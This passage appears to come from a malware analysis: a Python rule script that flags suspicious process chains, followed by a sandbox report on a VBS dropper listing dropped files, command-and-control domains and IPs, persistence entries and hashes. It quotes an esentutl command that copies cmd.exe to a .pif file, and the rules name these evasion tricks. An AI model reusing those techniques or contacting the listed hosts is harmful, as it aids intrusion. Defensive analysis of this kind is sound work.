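    return " > ".join(reversed(chain))


def analyse(events):
    """Return (ancestry chain, reason) pairs for every process that trips a rule."""
    tree = build_tree(events)
    findings = []
    for pid, (ppid, image, cmdline) in tree.items():
        exe = basename(image)
        parent = basename(tree[ppid][1]) if ppid in tree else ""
        reasons = []
        if parent in SCRIPT_HOSTS and USER_WRITABLE.search(image):
            reasons.append("script host launched an executable from a user-writable path")
        if exe.endswith(".pif") and USER_WRITABLE.search(image):
            reasons.append(".pif executable running from a user-writable path")
        if parent.endswith(".pif"):
            reasons.append("child of a .pif executable")
        if exe == "esentutl.exe":
            m = ESENTUTL_COPY.search(cmdline)
            if m and (USER_WRITABLE.search(m.group("dst")) or m.group("dst").lower().endswith(".pif")):
                reasons.append("esentutl.exe copied %s to %s" % (basename(m.group("src")), m.group("dst")))
        findings.extend((ancestry(tree, pid), reason) for reason in reasons)
    return findings


EVENTS = [  # constructed: (pid, ppid, image, command line); PIDs are arbitrary
    (1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    (1100, 1000, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\user\Desktop\IBKB.vbs"'),
    (1200, 1100, r"C:\Users\user\AppData\Local\Temp\x.exe", r"C:\Users\user\AppData\Local\Temp\x.exe"),
    (1300, 1200, r"C:\Users\Public\Libraries\aymtmquJ.pif", r"C:\Users\Public\Libraries\aymtmquJ.pif"),
    (1310, 1200, r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c esentutl.exe /y C:\Windows\System32\cmd.exe /d C:\Users\Public\alpha.pif /o"),
    (1320, 1310, r"C:\Windows\System32\esentutl.exe",  # assumed command line
     r"esentutl.exe /y C:\Windows\System32\cmd.exe /d C:\Users\Public\alpha.pif /o"),
    (1400, 1300, r"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe",
     r"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"),
    (1500, 1000, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),  # benign control
]

if __name__ == "__main__":
    for chain, reason in analyse(EVENTS):
        print(chain, "::", reason)
```

Each rule on its own is noisy (esentutl.exe has legitimate uses, and .pif files exist), which is why the output carries the whole chain: a wscript.exe ancestor over a .pif over esentutl.exe writing into C:\Users\Public is what turns four weak signals into one strong one.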

Screenshots (all thumbnails, including those not shown in the slideshow): windows-stand (image not reproduced in text)
Initial Sample
Source | Detection | Scanner | Label
IBKB.vbs | 39% | ReversingLabs | Script-WScript.Trojan.Valyria
IBKB.vbs | 100% | Avira | VBS/Drop.Agent.VPYN

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | 100% | Avira | W32/Patched.Ren.Gen
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\Juqmtmya.PIF | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\x.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\aymtmquJ.pif | 3% | ReversingLabs |
C:\Users\Public\alpha.pif | 0% | ReversingLabs |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      oshhkdluh.biz
                      54.244.188.177
                      truetrue
                        jpskm.biz
                        34.211.97.45
                        truefalse
                          ftxlah.biz
                          47.129.31.212
                          truefalse
                            vjaxhpbji.biz
                            82.112.184.197
                            truetrue
                              pywolwnvd.biz
                              54.244.188.177
                              truetrue
                                s82.gocheapweb.com
                                51.195.88.199
                                truetrue
                                  ifsaia.biz
                                  13.251.16.150
                                  truefalse
                                    ytctnunms.biz
                                    3.94.10.34
                                    truefalse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
lrxdmhrr.biz | 54.244.188.177 | true | true | |
vrrazpdh.biz | 34.211.97.45 | true | false | |
tbjrpv.biz | 34.246.200.160 | true | false | |
jhvzpcfg.biz | 44.221.84.105 | true | false | |
saytjshyf.biz | 44.221.84.105 | true | false | |
xlfhhhm.biz | 47.129.31.212 | true | false | |
fwiwk.biz | 172.234.222.143 | true | false | |
typgfhb.biz | 13.251.16.150 | true | false | |
npukfztj.biz | 44.221.84.105 | true | false | |
esuzf.biz | 34.211.97.45 | true | false | |
sxmiywsfv.biz | 13.251.16.150 | true | false | |
przvgke.biz | 172.234.222.143 | true | false | |
dwrqljrr.biz | 54.244.188.177 | true | true | |
myups.biz | 165.160.15.20 | true | false | |
gytujflc.biz | 208.100.26.245 | true | false | |
yauexmxk.biz | 18.208.156.248 | true | false | |
gvijgjwkh.biz | 3.94.10.34 | true | false | |
ssbzmoy.biz | 18.141.10.107 | true | false | |
knjghuig.biz | 18.141.10.107 | true | false | |
yunalwv.biz | 208.100.26.245 | true | false | |
gnqgo.biz | 18.208.156.248 | true | false | |
deoci.biz | 18.208.156.248 | true | false | |
brsua.biz | 3.254.94.185 | true | false | |
iuzpxe.biz | 13.251.16.150 | true | false | |
nqwjmb.biz | 35.164.78.200 | true | false | |
wllvnzb.biz | 18.141.10.107 | true | false | |
cvgrf.biz | 54.244.188.177 | true | true | |
qaynky.biz | 13.251.16.150 | true | false | |
lpuegx.biz | 82.112.184.197 | true | true | |
gxe0.com | 198.252.105.91 | true | false | |
bumxkqgxu.biz | 44.221.84.105 | true | false | |
qpnczch.biz | 18.246.231.120 | true | false | |
api.ipify.org | 172.67.74.152 | true | false | |
vcddkls.biz | 18.141.10.107 | true | false | |
acwjcqqv.biz | 18.141.10.107 | true | false | |
vyome.biz | 18.246.231.120 | true | false | |
uhxqin.biz | unknown | unknown | true | |
anpmnmxo.biz | unknown | unknown | true | |
zlenh.biz | unknown | unknown | true | |
lejtdj.biz | unknown | unknown | true | |
Name | Malicious | Antivirus Detection | Reputation
http://typgfhb.biz/rrrklmujfcwnchb | false | |
http://fwiwk.biz/jwvwqanfys | false | |
http://myups.biz/c | false | |
http://przvgke.biz/aunxkp | false | |
http://lpuegx.biz/bqdrapkxlqcka | true | |
http://cvgrf.biz/duhfjaeqhlnmwtn | true | |
http://yunalwv.biz/xalserxg | false | |
http://knjghuig.biz/nsnnyu | false | |
http://qaynky.biz/uiwlhtxrxipw | false | |
http://xlfhhhm.biz/mvnulpmrxwqe | false | |
http://przvgke.biz/cbhxke | false | |
http://gytujflc.biz/rofptsppofgiww | false | |
http://gvijgjwkh.biz/pggbsfikilutqo | false | |
http://npukfztj.biz/dkglfbueemimxh | false | |
http://lpuegx.biz/pfrxci | true | |
http://lrxdmhrr.biz/wt | true | |
http://dwrqljrr.biz/sbnrqyxuvimud | true | |
http://ssbzmoy.biz/clmhymdikmk | false | |
http://lpuegx.biz/sqxjvguhdtdacidd | true | |
http://pywolwnvd.biz/lcoyxsnwq | true | |
http://npukfztj.biz/jo | false | |
http://knjghuig.biz/mwpi | false | |
http://wllvnzb.biz/txsxc | false | |
http://saytjshyf.biz/qologlfowpsjwwtq | false | |
http://pywolwnvd.biz/cakchsrrlpkav | true | |
http://sxmiywsfv.biz/xwpgxeg | false | |
http://cvgrf.biz/v | true | |
http://fwiwk.biz/oiqbeltfrlpts | false | |
http://ssbzmoy.biz/ctaniunjcxta | false | |
http://lpuegx.biz/epmanlipym | true | |
http://deoci.biz/jlc | false | |
http://przvgke.biz/fckn | false | |
http://iuzpxe.biz/yngosjtj | false | |
http://yauexmxk.biz/wdbsnc | false | |
http://przvgke.biz/krmiyakxt | false | |
http://ssbzmoy.biz/kfhn | false | |
http://vcddkls.biz/cr | false | |
http://cvgrf.biz/xkcbxhnrv | true | |
http://jhvzpcfg.biz/qehuuaxgtrfd | false | |
http://ftxlah.biz/hppl | false | |
http://przvgke.biz/ksc | false | |
http://gytujflc.biz/iq | false | |
http://acwjcqqv.biz/srktyhawgjwb | false | |
http://nqwjmb.biz/s | false | |
http://myups.biz/rjreynucnxubyan | false | |
https://gxe0.com/yak2/233_Juqmtmyadyy | false | |
https://api.ipify.org/ | false | |
http://vjaxhpbji.biz/mshka | true | |
http://ifsaia.biz/ueacef | false | |
http://przvgke.biz/xyttxtxgf | false | |
http://oshhkdluh.biz/rsqlwjdrwk | true | |
http://vjaxhpbji.biz/ga | true | |
http://pywolwnvd.biz/vfpepibjtu | true | |
http://knjghuig.biz/h | false | |
http://ytctnunms.biz/qklr | false | |
http://npukfztj.biz/khahgpo | false | |
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp | false | |
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp | false | |
http://82.112.184.197/J | Native_neworigin.exe, 00000009.00000002.2431438104.0000000006990000.00000004.00000020.00020000.00000000.sdmp | false | |
https://aka.ms/pscore6lB | powershell.exe, 0000000B.00000002.2523044269.00000000051C1000.00000004.00000800.00020000.00000000.sdmp | false | |
https://nuget.org/nuget.exe | powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmp | false | |
http://172.234.222.143/ksc | Native_neworigin.exe, 00000009.00000002.2397017499.000000000090A000.00000004.00000020.00020000.00000000.sdmp | false | |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2523044269.00000000051C1000.00000004.00000800.00020000.00000000.sdmp | false | |
https://account.dyn.com/ | Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | |
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmp | false | |
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmp | false | |
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmp | false | |
http://82.112.184.197/$ | Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp | false | |
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmp | false | |
https://api.ipify.org/t | Native_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | false | |
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmp | false | |
http://18.141.10.107/nsnnyu | Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmp | false | |
http://r11.i.lencr.org/0 | Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmp | false | |
http://crl.micro | powershell.exe, 0000000B.00000002.2471994453.0000000003527000.00000004.00000020.00020000.00000000.sdmp | false | |
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000B.00000002.2523044269.0000000005311000.00000004.00000800.00020000.00000000.sdmp | false | |
http://s82.gocheapweb.com | Native_neworigin.exe, 00000009.00000002.2398313780.0000000003041000.00000004.00000800.00020000.00000000.sdmp | false | |
http://www.pmail.com | x.exe, x.exe, 00000002.00000002.2336563661.00000000224E2000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B62000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070075040.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020A90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2323160044.000000002217C000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2434873297.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2323160044.000000002211E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2191785418.0000000002C20000.00000004.00000020.00020000.00000000.sdmp, aymtmquJ.pif, 00000008.00000000.2159641261.0000000000416000.00000002.00000001.01000000.00000008.sdmp, Juqmtmya.PIF, 00000010.00000002.2348684542.0000000002D62000.00000004.00001000.00020000.00000000.sdmp, aymtmquJ.pif, 00000011.00000000.2324949898.0000000000416000.00000002.00000001.01000000.00000008.sdmp | false | |
http://ocsp.sectigo.com0C | x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp | false | |
http://82.112.184.197/epmanlipym | Native_neworigin.exe, 00000009.00000002.2431438104.0000000006990000.00000004.00000020.00020000.00000000.sdmp | false | |
https://gxe0.com/yak2/233_Juqmtmyadyyc | x.exe, 00000002.00000002.2165746672.00000000007BE000.00000004.00000020.00020000.00000000.sdmp | false | |
http://ocsp.sectigo.com0 | x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp | false | |
https://contoso.com/License | powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmp | false | |
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmp | false | |
                                                                                                                                                                                                                                                                                            http://54.244.188.177/QmKPNative_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                              http://18.141.10.107/Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                https://api.ipify.orgNative_neworigin.exe, 00000009.00000002.2398313780.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                  http://crl.verisNative_neworigin.exe, 00000009.00000002.2403789034.00000000051E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    http://x1.c.lencr.org/0Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                      http://x1.i.lencr.org/0Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                        https://contoso.com/powershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                          http://44.221.84.105/joNative_neworigin.exe, 00000009.00000002.2403789034.0000000005169000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                            http://54.244.188.177/Native_neworigin.exe, 00000013.00000002.2586371750.0000000006234000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2613552915.0000000006226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                  https://gxe0.com/yak2/233_Juqmtmx.exe, 00000002.00000002.2275324060.0000000020B9D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                    https://sectigo.com/CPS0x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                      http://r11.o.lencr.org0#Native_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2398313780.0000000003049000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2431438104.00000000069B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                        https://gxe0.com:443/yak2/233_Juqmtmyadyyx.exe, 00000002.00000002.2165746672.00000000007F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                          https://gxe0.com/x.exe, 00000002.00000002.2165746672.00000000007D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                            http://82.112.184.197:80/epmanlipymyNative_neworigin.exe, 00000009.00000002.2403789034.000000000518F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | ASN Country | Malicious
165.160.15.20 | myups.biz | United States | 19574 | CSC | US | false
3.94.10.34 | ytctnunms.biz | United States | 14618 | AMAZON-AES | US | false
34.246.200.160 | tbjrpv.biz | United States | 16509 | AMAZON-02 | US | false
198.252.105.91 | gxe0.com | Canada | 20068 | HAWKHOST | CA | false
172.234.222.143 | fwiwk.biz | United States | 20940 | AKAMAI-ASN1 | EU | false
18.208.156.248 | yauexmxk.biz | United States | 14618 | AMAZON-AES | US | false
208.100.26.245 | gytujflc.biz | United States | 32748 | STEADFAST | US | false
35.164.78.200 | nqwjmb.biz | United States | 16509 | AMAZON-02 | US | false
172.234.222.138 | unknown | United States | 20940 | AKAMAI-ASN1 | EU | false
51.195.88.199 | s82.gocheapweb.com | France | 16276 | OVH | FR | true
44.221.84.105 | jhvzpcfg.biz | United States | 14618 | AMAZON-AES | US | false
54.244.188.177 | oshhkdluh.biz | United States | 16509 | AMAZON-02 | US | true
13.251.16.150 | ifsaia.biz | United States | 16509 | AMAZON-02 | US | false
47.129.31.212 | ftxlah.biz | Canada | 34533 | ESAMARA-AS | RU | false
82.112.184.197 | vjaxhpbji.biz | Russian Federation | 43267 | FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMS | RU | true
18.141.10.107 | ssbzmoy.biz | United States | 16509 | AMAZON-02 | US | false
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENET | US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1559226
Start date and time: 2024-11-20 10:23:37 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
                                                                                                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                              Sample name:IBKB.vbs
                                                                                                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.expl.evad.winVBS@41/22@69/17
                                                                                                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                                                                                                              • Successful, ratio: 66.7%
                                                                                                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                                                                                                              • Successful, ratio: 90%
                                                                                                                                                                                                                                                                                                                              • Number of executed functions: 222
                                                                                                                                                                                                                                                                                                                              • Number of non-executed functions: 80
                                                                                                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                                                                                                              • Found application associated with file extension: .vbs
                                                                                                                                                                                                                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                              • Execution Graph export aborted for target Trading_AIBot.exe, PID 6544 because it is empty
                                                                                                                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 1532 because it is empty
                                                                                                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                              • VT rate limit hit for: IBKB.vbs
Time | Type | Description
04:24:32 | API Interceptor | 2x Sleep call for process: x.exe modified
04:24:49 | API Interceptor | 11414x Sleep call for process: Native_neworigin.exe modified
04:24:49 | API Interceptor | 21x Sleep call for process: powershell.exe modified
04:24:56 | API Interceptor | 2x Sleep call for process: Juqmtmya.PIF modified
04:25:44 | API Interceptor | 810x Sleep call for process: apihost.exe modified
10:24:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
10:24:46 | Task Scheduler | Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
10:24:55 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
10:25:07 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):104
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.195196088872012
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMsiBsOsbxTR/o1K/v:HRYFVmTWDyzmBsOExp/v
                                                                                                                                                                                                                                                                                                                              MD5:811E900846516BECCD50DE45A1003E8B
                                                                                                                                                                                                                                                                                                                              SHA1:8A4C5E174200CD079055817B7D4FC26FEE95C56C
                                                                                                                                                                                                                                                                                                                              SHA-256:350F2C77CF673BB1FCFD190B251255ECD00F0F1F8ACB2204EF46250957D5276A
                                                                                                                                                                                                                                                                                                                              SHA-512:EC78E8B96BD801AE6A1C4E996C750B06A59FE0F3BE11E85D3A68632D4D6619503B18BA39EF9BF99333B9684A99A1CD150B55F81607F96AE615DEBC5CC34303DF
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF"..IconIndex=931400..HotKey=72..
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):2386716
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.750563994554051
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:y4lGgAK/eHLG7HcOEPQW1LM9Cwyq7uP6yIFBlZ:ppAqyGTE1o9PPyOBlZ
                                                                                                                                                                                                                                                                                                                              MD5:5E9E591803218A9803C8F7B2C63DD663
                                                                                                                                                                                                                                                                                                                              SHA1:8711875A288EBD187AFFE45CD31EC8E55D05FDB1
                                                                                                                                                                                                                                                                                                                              SHA-256:BD53A567B8ED172FE46F5396276B2FA285CB9FCE1748411EB42960833CBC9A93
                                                                                                                                                                                                                                                                                                                              SHA-512:407B99B5AA46998EECCEED92484C0BDFE86EF56FA9AB1BAC83F13B3615EF1CCC898B0DEEC6A02F1659637B6723AE474781955E7A5EB8B28450210C734BE4503E
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
